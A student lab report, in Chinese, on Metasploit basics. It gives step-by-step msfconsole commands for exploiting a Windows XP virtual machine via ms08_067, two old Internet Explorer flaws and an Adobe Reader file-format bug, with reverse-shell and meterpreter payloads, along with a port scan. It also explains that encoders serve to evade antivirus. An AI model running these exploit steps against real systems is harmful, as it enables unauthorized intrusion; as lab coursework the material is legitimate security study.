首页 > 其他分享 > Exp6 MSF应用基础

Exp6 MSF应用基础

时间:2023-05-04 23:24:05浏览次数:46  
标签:set 攻击 Exp6 漏洞 exploit 应用 MSF XP payload

Exp6 MSF应用基础

目录

0.基础问题回答

(1)用自己的话解释什么是exploit,payload,encode.

  • exploit是渗透攻击,这个模块下面有针对各种平台各种软件下的漏洞开发的渗透攻击子模块,用户可以调用某一个连接漏洞对靶机进行攻击,将payload传送到靶机中。
  • payload是载荷,是攻击者用来与系统交互的简单脚本,exploit把它送到靶机中后,是真正负责进行攻击代码。
  • encode是编码,可以通过编码来消除类似0x00等漏洞无法处理的字符,来改变payload;还可以实现免杀,比如伪装特征码,本来容易被靶机安全软件所察觉,用了这个编码器中的编码后就打乱了特征码,从而迷惑靶机,不让杀毒软件很轻易的就发现payload是攻击代码。

1.实验过程记录

1.0 准备工作

创建共享文件夹成功

  • 关闭靶机防火墙

1.1一个主动攻击实践,尽量使用最新的类似漏洞;

利用ms08_067漏洞攻击Windows XP

攻击方式:ms08_06

靶机:Windows XP

xp系统打开cmd,再输入ipconfig指令查看其IP。
xp:192.168.233.139
kali:192.168.233.136

两台虚拟机相互能ping通

攻击者试探靶机是否存在此漏洞 nmap -sS -A --script=smb-vuln-ms08-067 -PO 192.168.233.139

存在漏洞信息

启动 msfconsole,输入search ms08_067查找该漏洞使用的攻击模块,攻击模块为exploit/windows/smb/ms08_067_netapi

use exploit/windows/smb/ms08_067_netapi		//选择使用的渗透模块
set payload generic/shell_reverse_tcp	   //使用的payload
set RHOSTS 192.168.233.139                 //设置靶机IP
exploit

成功获得shell

1.2 一个针对浏览器的攻击,尽量使用最新的类似漏洞;

  • 利用ms06_013_createtextrange漏洞攻击Windows XP SP3的IE浏览器

    use exploit/windows/browser/ms06_013_createtextrange //选择使用exploit漏洞
    set payload windows/meterpreter/reverse_tcp  //选择payload
    show options //查看所需调的参数
    exploit   //开始攻击
    

在XP的IE浏览器打开在XP的IE浏览器打开

http://192.168.233.136:8080/rVDOEPVEUtoG

浏览器开始从0-100计时。

  • 利用ms14_064进行漏洞攻击

    use windows/browser/ms14_064_ole_code_execution
    set payload windows/meterpreter/reverse_tcp
    set LHOST 192.168.233.136
    set LPORT 1312
    set URIPATH 1312xzy
    exploit
    

在windows xp虚拟机的浏览器中输入:

http://192.168.233.136:8080/1312xzy

这时kali创建了连接

先exit,再键入:sessions -i 2就会显示攻击成功:

1.3 一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞;

攻击方式:Adobe(adobe_cooltype_sing) (XP)

msfconsole //进入控制台
search adobe //进行查找
use windows/fileformat/adobe_cooltype_sing //使用漏洞
info //查看漏洞具体信息
set payload windows/meterpreter/bind_tcp //选择攻击载荷
show options //查看详细信息
set LPORT 1312//设置端口号
set RHOST 192.168.233.139//设置靶机IP地址
exploit #攻击
将生成的msf文件复制到win xp中,点击回连
(可以使用cp命令将文件复制到桌面再移动,也可以使用超级用户权限进入root)

use exploit/multi/handler //进入监听模块
set payload windows/meterpreter/bind_tcp //选择攻击载荷
show options //查看详细信息
set RHOST 192.168.233.139 //设置靶机IP地址
set LPORT 1312 //设置端口号
exploit //攻击

回连未成功

1.4 成功应用任何一个辅助模块。

端口扫描:auxiliary/scanner/portscan

对XP主机进行TCP端口扫描。

use auxiliary/scanner/portscan/tcp // 选择tcp脚本
show options 	//查看需要调的参数
set Rhosts 192.168.233.139  //设置靶机IP
exploit 

最后可以得出,XP主机开放的TCP端口有三个,分别是135端口、139端口、445端口。

2.问题与解决

在做第三个实验时,XP虚拟机双击回连,kali虚拟机无反应,感觉并未触发回连

这个漏洞针对Adobe阅读器9.3.4之前的版本,一个名为SING表对象中一个名为uniqueName的参数造成缓冲区溢出。

3.实验总结与体会

​ 本次实验是迄今为止我遇到问题最多的一次,首先XP虚拟机的安装配置就用了我好长时间,下载好的虚拟机界面只有一个回收站图标,加上对老的系统的不熟悉,花了好久才找到映射网络驱动器。

​ 想要真正实现一次攻击,不仅要找到一个合适的漏洞,还要知道这个漏洞具体是干嘛的、这个漏洞与哪个版本的系统相匹配、如何才能实现漏洞攻击等一系列步骤。好不容易找到了一个漏洞,却发现它可能根本不适用于win7\winXP。

4.离实战还缺些什么技术和步骤

本次实验中我们使用的漏洞都是已经公开的,且已经被打过补丁的漏洞,这些漏洞现在因为版本的更新而无法使用,起到的更多的是示例效果。况且攻击前还需要确保对方关闭了防火墙、确保对方打开了需要的端口、还需要知道对方的ip地址......这些在真正的实战中都是无法得到保障的。

所以想要真正在实战中用到漏洞,就要找到一些尚未被发现的漏洞,或者掌握一些类似于绕过防火墙的攻击手段,很明显想要做到这个地步,需要我们了解并掌握大量的网络安全知识。

标签:set,攻击,Exp6,漏洞,exploit,应用,MSF,XP,payload
From: https://www.cnblogs.com/xzy01/p/17372857.html

相关文章

  • MSF应用基础
    MSF应用基础基础问题回答用自己的话解释什么是exploit,payload,encode.exploit语义上来讲是利用计算机系统或者软件漏洞的行为方式,目的为实现非法或未授权的访问行为。在Metasploit框架中,exploit是指利用程序中的漏洞来攻击目标系统的代码,Metasploit框架提供了许多现成的e......
  • Exp6 MSF应用基础
    目录一、实践内容二、实践过程(一)创建靶机(二)一个主动攻击实践1.利用ms08_067漏洞攻击WindowsXP2.利用ms17_010_eternalblue漏洞攻击Windows(三)一个针对浏览器的攻击1.利用ms06_013_createtextrange漏洞攻击WindowsXPSP3的IE浏览器(1)设计攻击模块及参数(四)一个针对客户端的攻击1.Ad......
  • 网络对抗实验六 MSF应用基础--20201313
    《网络对抗技术》——Exp6MSF应用基础目录《网络对抗技术》——Exp6MSF应用基础一、实践内容二、问题回答三、实践过程实验准备:1、一个主动攻击实践ms08_067_netapi2、一个针对浏览器的攻击ms10_018_ie_behaviors3、一个针对客户端的攻击Wireshark4、成功应用一个辅助模块sniff......
  • Exp6 MSF应用基础
    目录一.实验信息二.实验内容三.实验知识四.实验过程4.1一个主动攻击实践(ms17_010)4.2一个针对浏览器的攻击(ms10_018)4.3一个针对客户端的攻击4.4成功应用任何一个辅助模块(scannerport)五.基础问题回答六.实验总结体会一.实验信息课程名称:网络对抗技术实验序号:6实验名称:MSF......
  • 《网络对抗技术》——Exp6 MSF应用基础
    目录一、实践内容二、实践原理三、实践过程1、一个主动攻击实践4.2针对浏览器的攻击3、一个针对客户端的攻击4、成功应用一个辅助模块四、实践问题回答五、离实践还缺什么技术或步骤六、实践心得体会一、实践内容本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻......
  • 网络对抗实验六 MSF应用基础
    Exp6MSF应用基础实验目标1.1一个主动攻击实践,尽量使用最新的类似漏洞;(1分)1.2一个针对浏览器的攻击,尽量使用最新的类似漏洞;(1分)1.3一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞;(1分)1.4成功应用任何一个辅助模块。(1分)实验内容0实验准备0.1实验原理0.1.......
  • 20201306 Exp6 MSF应用基础
    一、实践内容二、实践原理三、实践过程1、一个主动攻击实践ms08_067_netapims17_0102、一个针对浏览器的攻击ms14_064ms17-0103、一个针对客户端的攻击AdobeWireshark4、成功应用一个辅助模块sniffer嗅探portscan端口扫描MSF使用nmap四、实践问题回答五、离实践......
  • transformers在ctr中的应用
    文章目录1.背景2.相关论文解析2.1《AutoInt:AutomaticFeatureInteractionLearningviaSelf-AttentiveNeuralNetworks》2.1.1论文贡献2.1.2模型结构2.1.2.1输入2.1.2.2注意力机制层2.1.3实验结果2.2《BehaviorSequenceTransformerforE-commerceRecommendationin......
  • SQL 通用表达式递归查询的应用举例
    前置知识对于大多数人来说,SQL意味着SELECT、INSERT、UPDATE和DELETE。但实际上,SQL能够实现的功能远远不止简单的增删改查;今天我们来介绍一个高级功能:通用表表达式(CommonTableExpression)。CTE可以提高复杂查询的性能和可读性,实现树状结构或者图数据的遍历。例如:生成数字......
  • Exp6 MSF应用基础
    一、实验原理(1)MSF简介Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。(2)程序特点这种可以扩展的模型将负载控制,编码器,无操作生成器和漏洞整合在一起,使MetasploitFramewo......